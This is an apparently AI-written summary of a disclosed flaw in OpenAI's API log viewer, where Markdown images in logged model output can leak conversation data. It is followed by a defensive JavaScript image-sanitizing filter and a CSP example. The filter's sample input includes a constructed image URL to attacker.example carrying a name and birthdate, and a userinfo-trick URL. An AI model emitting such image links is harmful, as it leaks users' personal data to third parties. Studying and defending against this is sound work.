🤖 AI Summary
OpenAI's API log viewer has been exposed as vulnerable to a data exfiltration attack, risking the privacy of applications built on its ‘responses’ and ‘conversations’ APIs. The issue arises from insecure Markdown image rendering in the API logs, which allows potentially sensitive data to be exfiltrated when developers open logged conversations, even if they implement various defenses in their applications. Although the vulnerability was responsibly disclosed, OpenAI closed the report as 'not applicable' after several follow-ups, leaving users of the platform at risk.
This situation is particularly significant for the AI/ML community because it highlights critical security vulnerabilities in widely used architectural elements associated with OpenAI's tools and APIs. Researchers demonstrated a scenario using a Know Your Customer (KYC) tool, where sensitive user data could be leaked via crafted Markdown images. Given that many vendors leverage OpenAI as a subprocessor, the repercussions of this vulnerability could be far-reaching. Developers are urged to adopt stronger measures, such as content security policies and better sanitization of outputs, to mitigate these risks as they continue to build robust AI solutions.
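One way to apply the output sanitization and content security policy measures mentioned above, as an added example that is not code from OpenAI or the researchers: a pre-render filter that keeps Markdown images only from an allowlisted host, plus the matching `img-src` policy. The host `static.example.com`, the function names and the sample text are assumptions constructed for illustration.

```javascript
// Added example. The allowlisted host and every sample string are constructed.
const ALLOWED_IMAGE_HOSTS = new Set(["static.example.com"]);

// Inline image: ![alt](url "optional title")
const INLINE_IMAGE = /!\[[^\]]*\]\(\s*<?([^)\s>]*)>?[^)]*\)/g;
// Reference definition: [label]: url "optional title"
const REFERENCE_DEF = /^[ \t]{0,3}\[[^\]]+\]:\s*<?(\S+?)>?(?:[ \t].*)?$/gm;

// True only for absolute https URLs whose parsed hostname is allowlisted.
function isAllowedImageUrl(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (err) {
    return false; // relative, empty or malformed destinations are rejected
  }
  return url.protocol === "https:" && ALLOWED_IMAGE_HOSTS.has(url.hostname);
}

// Replace images and reference definitions that would make the viewer's
// browser fetch from a host outside the allowlist. The placeholders contain
// no Markdown syntax, so they cannot combine with nearby text into a new image.
function neutralizeImages(markdown) {
  return markdown
    .replace(INLINE_IMAGE, (match, url) =>
      isAllowedImageUrl(url) ? match : "{image removed}")
    .replace(REFERENCE_DEF, (match, url) =>
      isAllowedImageUrl(url) ? match : "{reference removed}");
}

// Matching CSP value for the page that renders logs (second layer).
function imgSrcPolicy() {
  const hosts = [...ALLOWED_IMAGE_HOSTS].map((h) => `https://${h}`);
  return `img-src 'self' ${hosts.join(" ")}`;
}

// Constructed model output carrying a value from the conversation in the URL.
const sample = [
  "Verification complete.",
  "![status](https://attacker.example/p.png?d=Jane%20Doe%201990-01-01)",
  "![logo](https://static.example.com/logo.png \"Logo\")",
  "![s][r]",
  "",
  "[r]: https://static.example.com@attacker.example/q.png?d=4111",
].join("\n");

console.log(neutralizeImages(sample));
console.log(imgSrcPolicy());
```

A regex filter like this only approximates a real Markdown parser, so the renderer should also have raw HTML disabled, with the CSP in place as the backstop.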